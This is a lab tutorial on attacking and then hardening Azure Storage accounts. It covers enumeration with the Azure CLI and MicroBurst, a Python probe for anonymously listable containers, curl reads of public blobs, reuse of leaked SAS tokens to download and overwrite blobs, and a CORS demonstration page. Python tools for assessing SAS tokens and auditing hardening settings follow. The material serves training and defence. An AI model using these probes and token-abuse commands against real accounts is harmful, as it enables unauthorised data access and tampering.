Attacking Azure Storage Accounts
Explore techniques to enumerate and exploit insecure Azure Storage account configurations.
Lab Objectives
- Understand Azure Storage account security features
- Learn enumeration techniques for Azure Storage accounts
- Exploit common misconfigurations in Storage accounts
- Implement security best practices for Azure Storage
Prerequisites
- Basic understanding of Azure Storage concepts
- Familiarity with Azure CLI or PowerShell
- Access to an Azure test environment
Lab Steps
Step 1: Enumerating Azure Storage Accounts
In this step, we'll use several techniques to enumerate Azure Storage accounts: first from inside a subscription we already have access to, then from the outside with no credentials at all, which is where a real attacker starts.

1. Using Azure CLI to list the storage accounts in the current subscription (requires a signed-in identity with at least Reader on them):

```bash
az storage account list --query "[].{Name:name, ResourceGroup:resourceGroup}" -o table
```

2. Enumerate the containers in an account. `--auth-mode login` authenticates with your Microsoft Entra ID token, so the identity needs a data-plane role such as Storage Blob Data Reader on the account; this is an authenticated inventory, not an anonymous check. In the output, each container's `properties.publicAccess` field tells you what anonymous callers get: `container` allows anonymous listing and reads, `blob` allows anonymous reads of blobs whose names you already know, and `null` allows nothing.

```bash
az storage container list --account-name <storage-account-name> --auth-mode login
```

3. Use MicroBurst to discover storage accounts and public containers without any Azure credentials. `Invoke-EnumerateAzureBlobs` takes a base word, generates name permutations, checks which `<name>.blob.core.windows.net` hostnames resolve (storage account names are globally unique, so an unresolvable name is unassigned), and then tries a wordlist of container names against each live account for anonymous listing:

```powershell
Import-Module .\MicroBurst.psm1
Invoke-EnumerateAzureBlobs -Base <storage-account-name>
```

Analyze the output to identify publicly accessible storage accounts and containers. Record the account name, container name and public access level for each hit; Step 2 builds on them.
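The same anonymous check that MicroBurst performs, written out so the status codes are visible, as an added Python example that is not part of the original lab or of MicroBurst. It resolves the account hostname, issues the unauthenticated "List Blobs" call and classifies the reply; the account name, container name and XML replies below are constructed for the example, and the 404 handling assumes (as the Blob service does for anonymous callers) that a private container and a missing one are indistinguishable.

```python
"""Added example (not part of the original lab): probe a container for
anonymous access the way MicroBurst does, and classify the reply using the
Blob service REST status/error codes. Only probe() and account_exists()
touch the network; the classifier and parser run offline on the constructed
samples below."""
import socket
import sys
import urllib.error
import urllib.request
import xml.etree.ElementTree as ET

BLOB_HOST = "{account}.blob.core.windows.net"


def account_exists(account: str) -> bool:
    """Storage account names are globally unique, so an unresolvable
    hostname means the name is unassigned. Resolving proves existence
    only, not public access."""
    try:
        socket.gethostbyname(BLOB_HOST.format(account=account))
        return True
    except socket.gaierror:
        return False


def classify_listing(status: int, body: str) -> str:
    """Map an anonymous 'List Blobs' reply to what it tells an attacker."""
    if status == 200 and "<EnumerationResults" in body:
        return "public-listable"          # public access level: container
    if status == 409 and "PublicAccessNotPermitted" in body:
        return "account-blocks-public"    # allowBlobPublicAccess is false
    if status == 404:
        # A private container and a missing container both come back as
        # 404 to anonymous callers; listing alone cannot tell them apart.
        return "private-or-missing"
    if status in (401, 403):
        return "auth-required"
    return f"unexpected-{status}"


def parse_blob_names(listing_xml: str) -> list[str]:
    """Pull blob names out of an EnumerationResults document."""
    root = ET.fromstring(listing_xml)
    return [n.text for n in root.findall("./Blobs/Blob/Name") if n.text]


def probe(account: str, container: str, timeout: float = 10.0) -> tuple[str, list[str]]:
    """Issue the anonymous List Blobs call and classify the answer."""
    url = (f"https://{BLOB_HOST.format(account=account)}/{container}"
           "?restype=container&comp=list")
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            status, body = resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as exc:
        status, body = exc.code, exc.read().decode("utf-8", "replace")
    except urllib.error.URLError:
        return "unreachable", []
    verdict = classify_listing(status, body)
    names = parse_blob_names(body) if verdict == "public-listable" else []
    return verdict, names


# Constructed sample replies (account, container and blob names are made up).
SAMPLE_LISTING = """<EnumerationResults ServiceEndpoint="https://example.blob.core.windows.net/" ContainerName="backups">
  <Blobs>
    <Blob><Name>db-2024-01.bak</Name><Properties><Content-Length>1048576</Content-Length></Properties></Blob>
    <Blob><Name>appsettings.json</Name><Properties><Content-Length>812</Content-Length></Properties></Blob>
  </Blobs>
  <NextMarker />
</EnumerationResults>"""

SAMPLE_BLOCKED = ("<Error><Code>PublicAccessNotPermitted</Code>"
                  "<Message>Public access is not permitted on this storage account.</Message></Error>")

if __name__ == "__main__":
    # usage: python probe_container.py <storage-account-name> <container-name>
    acct, cont = sys.argv[1], sys.argv[2]
    if not account_exists(acct):
        print(f"{acct}: hostname does not resolve, account name is unassigned")
    else:
        verdict, names = probe(acct, cont)
        print(f"{acct}/{cont}: {verdict}", *names, sep="\n  ")
```

A `public-listable` verdict with a populated name list is the finding worth reporting; `private-or-missing` still leaves the `blob` public access level open, so a wordlist of blob names against `/<container>/<blob>` is the natural next step.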
Step 2: Exploiting Insecure Storage Account Configurations
Now that we've identified potentially vulnerable storage accounts, let's exploit some common misconfigurations.

1. Accessing public blob containers. A container whose public access level is `container` answers the Blob REST "List Blobs" call without any credentials, so plain `curl` is all that is needed (the Azure CLI's `--auth-mode login` would require an Entra ID identity with a role on the account, which is not what we are testing). A `blob`-level container refuses the listing but still serves any blob whose name you know or can guess:

```bash
# anonymous listing: works only at the "container" public access level
curl -s "https://<storage-account-name>.blob.core.windows.net/<container-name>?restype=container&comp=list"

# anonymous read of a known blob: works at both the "container" and "blob" levels
curl -s -o <blob-name> "https://<storage-account-name>.blob.core.windows.net/<container-name>/<blob-name>"
```

2. Exploiting overly permissive Shared Access Signatures (SAS):
- Identify a SAS token with excessive permissions. Tokens leak through source repositories, client-side JavaScript, CI logs and support tickets. The grant is readable straight from the query string: `sp` is the permission set (`r` read, `w` write, `d` delete, `l` list, `c` create, `a` add), `sr` (service SAS) or `ss`/`srt` (account SAS) is the scope, `se` the expiry, `sip` the allowed source IPs and `spr` the allowed protocols. An account SAS with `sp=rwdl`, an expiry years away and no `sip` is effectively a second set of account keys.
- Use the SAS token to access and, where `sp` includes `w` or `c`, modify data:

```bash
# read a blob with the token
az storage blob download --account-name <storage-account-name> --container-name <container-name> \
  --name <blob-name> --file <local-path> --sas-token "<sas-token>"

# with write or create permission the same token overwrites or plants content
az storage blob upload --account-name <storage-account-name> --container-name <container-name> \
  --name <blob-name> --file <local-path> --sas-token "<sas-token>" --overwrite
```

3. Leveraging CORS misconfigurations:
- Identify storage accounts with overly permissive CORS settings, for example an allowed origin of `*` combined with `PUT` or `DELETE` in the allowed methods. CORS never grants access by itself: the browser's request must already be authorized (a public blob, or a SAS in the URL), and browsers send no cookies to the storage endpoint. What a permissive rule adds is that any web page, not just the application's own front end, can read the response in the victim's browser, and with `PUT` allowed, write with the same authorization. It matters mainly in combination with the two findings above.
- Create a simple web page to demonstrate cross-origin access to the storage account. Serve it from an origin other than the storage endpoint (for example `python -m http.server` on localhost) and open it with the browser console visible:

```html
<!DOCTYPE html>
<html>
<body>
<script>
// Served from an origin that is NOT the storage account's, e.g. http://localhost:8000.
// The request succeeds only if the blob is readable (public or SAS in the URL) and
// the account's CORS rules allow this origin and the GET method.
fetch('https://<storage-account-name>.blob.core.windows.net/<container-name>/<blob-name>', {
  method: 'GET',
  mode: 'cors'
})
  .then(response => {
    if (!response.ok) throw new Error('HTTP ' + response.status);
    return response.text();
  })
  .then(data => console.log(data))
  .catch(error => console.error('Error:', error));
</script>
</body>
</html>
```

Test the web page: if the blob's contents appear in the console, the storage account's CORS rules allow your origin. If the browser blocks the request, the console shows a CORS error from the browser rather than an HTTP status from Azure, which is the behaviour a correctly scoped CORS policy should produce.
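Reading a leaked SAS by eye is error-prone, so here is an added Python example (not part of the original lab) that decodes a token or blob URL and flags what makes it dangerous: account-level scope, mutating permissions, list permission, lifetime, plain HTTP and missing source-IP restriction. The parameter names are the standard SAS query parameters; the two tokens and the `ASSESS_AT` reference time are constructed for the example and the `sig` values are placeholders, not real signatures.

```python
"""Added example (not part of the original lab): decode a Shared Access
Signature and flag the grants that make it dangerous when it leaks. Field
names are the SAS query parameters (sp, sr, ss, srt, se, sip, spr, si);
the sample tokens below are constructed and their sig values are not valid."""
from datetime import datetime, timedelta, timezone
from typing import Optional
from urllib.parse import parse_qs, urlparse

PERMISSION_NAMES = {
    "r": "read", "a": "add", "c": "create", "w": "write", "d": "delete",
    "x": "delete-version", "y": "permanent-delete", "l": "list", "t": "tag",
    "f": "filter", "m": "move", "e": "execute", "i": "set-immutability",
    "o": "ownership", "p": "permissions",
}
# Anything in this set lets the holder change or destroy data.
MUTATING = set("acwdxymiop")
# Fixed reference time for the constructed samples (assumption for this example).
ASSESS_AT = datetime(2025, 1, 1, tzinfo=timezone.utc)


def parse_sas(token_or_url: str) -> dict[str, str]:
    """Accept a full blob URL, a token starting with '?', or a bare query string."""
    query = urlparse(token_or_url).query if "://" in token_or_url else token_or_url.lstrip("?")
    return {k: v[0] for k, v in parse_qs(query, keep_blank_values=True).items()}


def parse_sas_time(value: Optional[str]) -> Optional[datetime]:
    """se/st accept full UTC timestamps or a bare date."""
    if not value:
        return None
    for fmt in ("%Y-%m-%dT%H:%M:%SZ", "%Y-%m-%dT%H:%MZ", "%Y-%m-%d"):
        try:
            return datetime.strptime(value, fmt).replace(tzinfo=timezone.utc)
        except ValueError:
            continue
    return None


def assess_sas(token_or_url: str, now: Optional[datetime] = None) -> dict:
    now = now or datetime.now(timezone.utc)
    p = parse_sas(token_or_url)
    perms = set(p.get("sp", ""))
    findings = []

    # Scope: an account SAS (ss/srt) reaches every container; sr=c covers a whole container.
    if "ss" in p or "srt" in p:
        kind = "account"
        findings.append(f"account SAS over services '{p.get('ss', '')}', "
                        f"resource types '{p.get('srt', '')}': not tied to one blob")
    elif "sr" in p:
        kind = "service"
        if p["sr"] == "c":
            findings.append("container-scoped: applies to every blob in the container")
    else:
        kind = "unknown"

    mutating = sorted(perms & MUTATING)
    if mutating:
        findings.append("mutating permissions: " +
                        ", ".join(PERMISSION_NAMES.get(c, c) for c in mutating))
    if "l" in perms:
        findings.append("list permission: blob names can be enumerated")

    # Lifetime: omitting se is only legal when a stored access policy (si) supplies it.
    expiry = parse_sas_time(p.get("se"))
    expired = expiry is not None and expiry <= now
    if expiry is None and "si" not in p:
        findings.append("no expiry (se) and no stored access policy (si)")
    elif expired:
        findings.append("expired: token is no longer usable")
    elif expiry is not None and expiry - now > timedelta(days=30):
        findings.append(f"long-lived: valid for {(expiry - now).days} more days")
    if "si" in p:
        findings.append(f"stored access policy '{p['si']}': revocable by deleting the policy")

    # Transport and network: spr defaults to https,http when omitted.
    if p.get("spr", "https,http") != "https":
        findings.append("plain HTTP allowed (spr is not 'https')")
    if "sip" not in p:
        findings.append("no source IP restriction (sip)")

    if expired:
        severity = "none"
    elif mutating or kind == "account":
        severity = "high"
    elif findings:
        severity = "medium"
    else:
        severity = "low"
    return {"kind": kind, "permissions": sorted(perms), "expires": expiry,
            "findings": findings, "severity": severity}


# Constructed tokens: the sig values are placeholders, not real signatures.
LEAKED_ACCOUNT_SAS = ("?sv=2022-11-02&ss=b&srt=sco&sp=rwdlacx&se=2030-01-01T00:00:00Z"
                      "&spr=https,http&sig=PLACEHOLDER")
SCOPED_BLOB_SAS = ("https://example.blob.core.windows.net/reports/q1.pdf"
                   "?sv=2022-11-02&sr=b&sp=r&se=2025-01-02T00:00:00Z"
                   "&sip=203.0.113.10&spr=https&sig=PLACEHOLDER")

if __name__ == "__main__":
    for token in (LEAKED_ACCOUNT_SAS, SCOPED_BLOB_SAS):
        result = assess_sas(token, now=ASSESS_AT)
        print(result["severity"], result["kind"], "".join(result["permissions"]), *result["findings"], sep="\n  ")
```

The second token shows what a well-scoped SAS looks like: one blob, read only, a one-day expiry, HTTPS only and a single allowed source address, which yields no findings. Note that a stored access policy is a finding in the neutral sense: it is the only kind of SAS that can be revoked without rotating the account key.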
Step 3: Implementing Security Best Practices
To secure Azure Storage accounts, implement the following best practices. Items 2, 3 and 5 close the specific holes exploited in Step 2; the commands assume the Azure CLI is signed in with Contributor or Owner rights on the account.

1. Enable Microsoft Defender for Storage (formerly Azure Defender for Storage) on the subscription. It alerts on anonymous scanning of the kind performed in Step 1, on unusual access patterns and on malware uploads, but it detects rather than prevents:

```bash
az security pricing create -n StorageAccounts --tier 'Standard'
```

2. Configure network security. Setting the default action to `Deny` makes the endpoint reachable only from IP ranges and virtual network subnets you add afterwards as network rules, while `--bypass AzureServices` keeps trusted Azure services such as Backup and Monitor working. Combine this with `--allow-blob-public-access false` on the same command, which prevents any container in the account from being set to `container` or `blob` public access; without it, the public containers from Step 2 stay open to anyone inside the allowed networks:

```bash
az storage account update --resource-group <resource-group> --name <storage-account-name> --default-action Deny --bypass AzureServices
```

3. Enable secure transfer (HTTPS only), so that SAS tokens and account keys are never sent in clear text. Adding `--min-tls-version TLS1_2` to the same command also rejects the obsolete TLS 1.0 and 1.1 protocol versions:

```bash
az storage account update --resource-group <resource-group> --name <storage-account-name> --https-only true
```

4. Use Azure Key Vault to manage storage account keys. Keeping the key in Key Vault gets it out of application configuration files, but a key is still a key: anyone who reads it has full control of the account, and the `--value` argument below leaves it in your shell history, so rotate the key afterwards and grant applications read access to the secret through Key Vault RBAC rather than sharing it. Where nothing depends on the key, go further and disable shared key authentication entirely with `--allow-shared-key-access false` so only Entra ID identities can reach the data:

```bash
az keyvault create --name <keyvault-name> --resource-group <resource-group>
az keyvault secret set --vault-name <keyvault-name> --name <secret-name> --value <storage-account-key>
```

5. Implement least privilege access control:
- Use Microsoft Entra ID (formerly Azure AD) for authentication instead of account keys
- Assign data-plane RBAC roles scoped to the container (for example Storage Blob Data Reader rather than Storage Blob Data Contributor) and only at the scope needed
- Issue SAS tokens with limited scope and expiration: a single blob (`sr=b`) rather than the account, read-only (`sp=r`) unless writing is required, a short `se`, a `sip` range and `spr=https`; prefer user delegation SAS, which is backed by an Entra ID identity, over key-signed SAS

6. Enable soft delete and versioning for blob data so that a blob deleted or overwritten with a leaked SAS, as in Step 2, can be recovered within the retention window:

```bash
az storage account blob-service-properties update --resource-group <resource-group> --account-name <storage-account-name> --enable-delete-retention true --delete-retention-days 7
az storage account blob-service-properties update --resource-group <resource-group> --account-name <storage-account-name> --enable-versioning true
```

By implementing these best practices, you can significantly improve the security of your Azure Storage accounts and reduce the risk of unauthorized access or data loss. Re-run the enumeration from Step 1 afterwards: the anonymous listing should now fail with a `PublicAccessNotPermitted` error, and the CLI inventory should show no container with a public access level.
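To verify that the hardening actually landed, here is an added Python example (not part of the original lab) that audits the JSON returned by `az storage account show` and `az storage account blob-service-properties show` against the controls above, including the CORS rules from Step 2. The two pairs of sample documents, a weak and a hardened version of the same lab account, are constructed for the example; the key names follow the Azure CLI output as I know it, with the ARM spellings `supportsHttpsTrafficOnly` and `networkAcls` accepted as fallbacks, and a missing or null value is treated as the insecure default.

```python
"""Added example (not part of the original lab): check the JSON returned by
`az storage account show` and `az storage account blob-service-properties show`
against the controls in Step 3. The two sample documents are constructed for
this example; key names follow the CLI output, and the ARM spellings
(supportsHttpsTrafficOnly, networkAcls) are accepted as fallbacks."""
import json
import sys

SECURE_TLS = ("TLS1_2", "TLS1_3")
WRITE_METHODS = {"PUT", "POST", "DELETE", "MERGE", "PATCH"}


def _first(d, *keys, default=None):
    """Return the first present, non-null key from a dict (CLI vs ARM spellings)."""
    for k in keys:
        if isinstance(d, dict) and d.get(k) is not None:
            return d[k]
    return default


def audit(account: dict, blob_props: dict) -> list[str]:
    """Return one finding per control that is not in its hardened state."""
    findings = []
    # Null means 'not set'; older accounts treat that as enabled, so flag it.
    if _first(account, "allowBlobPublicAccess", default=True):
        findings.append("allowBlobPublicAccess is not false: containers can still be made anonymous")
    if not _first(account, "enableHttpsTrafficOnly", "supportsHttpsTrafficOnly", default=False):
        findings.append("secure transfer (HTTPS only) is off")
    if _first(account, "minimumTlsVersion", default="TLS1_0") not in SECURE_TLS:
        findings.append("minimumTlsVersion below TLS1_2")
    rules = _first(account, "networkRuleSet", "networkAcls", default={})
    if _first(rules, "defaultAction", default="Allow") == "Allow":
        findings.append("network default action is Allow: reachable from any address")
    if _first(account, "allowSharedKeyAccess", default=True):
        findings.append("shared key access enabled: account keys and key-signed SAS bypass Entra ID RBAC")
    retention = _first(blob_props, "deleteRetentionPolicy", default={})
    if not _first(retention, "enabled", default=False):
        findings.append("blob soft delete disabled")
    if not _first(blob_props, "isVersioningEnabled", default=False):
        findings.append("blob versioning disabled")
    for rule in _first(_first(blob_props, "cors", default={}), "corsRules", default=[]):
        origins = rule.get("allowedOrigins", [])
        methods = {m.upper() for m in rule.get("allowedMethods", [])}
        if "*" in origins and methods & WRITE_METHODS:
            findings.append(f"CORS rule allows any origin with {sorted(methods & WRITE_METHODS)}")
        elif "*" in origins:
            findings.append("CORS rule allows any origin")
    return findings


# Constructed samples shaped like the CLI output for the lab account before and after Step 3.
WEAK_ACCOUNT = {
    "name": "labstorage01", "allowBlobPublicAccess": True,
    "enableHttpsTrafficOnly": False, "minimumTlsVersion": "TLS1_0",
    "networkRuleSet": {"bypass": "AzureServices", "defaultAction": "Allow",
                       "ipRules": [], "virtualNetworkRules": []},
    "allowSharedKeyAccess": None,
}
WEAK_BLOB_PROPS = {
    "deleteRetentionPolicy": {"enabled": False, "days": None},
    "isVersioningEnabled": False,
    "cors": {"corsRules": [{"allowedOrigins": ["*"], "allowedMethods": ["GET", "PUT"],
                            "allowedHeaders": ["*"], "exposedHeaders": ["*"],
                            "maxAgeInSeconds": 3600}]},
}
HARDENED_ACCOUNT = {
    "name": "labstorage01", "allowBlobPublicAccess": False,
    "enableHttpsTrafficOnly": True, "minimumTlsVersion": "TLS1_2",
    "networkRuleSet": {"bypass": "AzureServices", "defaultAction": "Deny",
                       "ipRules": [{"action": "Allow", "ipAddressOrRange": "203.0.113.0/24"}],
                       "virtualNetworkRules": []},
    "allowSharedKeyAccess": False,
}
HARDENED_BLOB_PROPS = {
    "deleteRetentionPolicy": {"enabled": True, "days": 7},
    "isVersioningEnabled": True,
    "cors": {"corsRules": []},
}

if __name__ == "__main__":
    # usage: python audit_storage.py account.json blob-props.json
    with open(sys.argv[1]) as a, open(sys.argv[2]) as b:
        for line in audit(json.load(a), json.load(b)) or ["no findings"]:
            print(line)
```

Feed it the output of `az storage account show -n <storage-account-name> -g <resource-group> -o json` and `az storage account blob-service-properties show --account-name <storage-account-name> -g <resource-group> -o json`; an empty result means every control in this step is in place for that account.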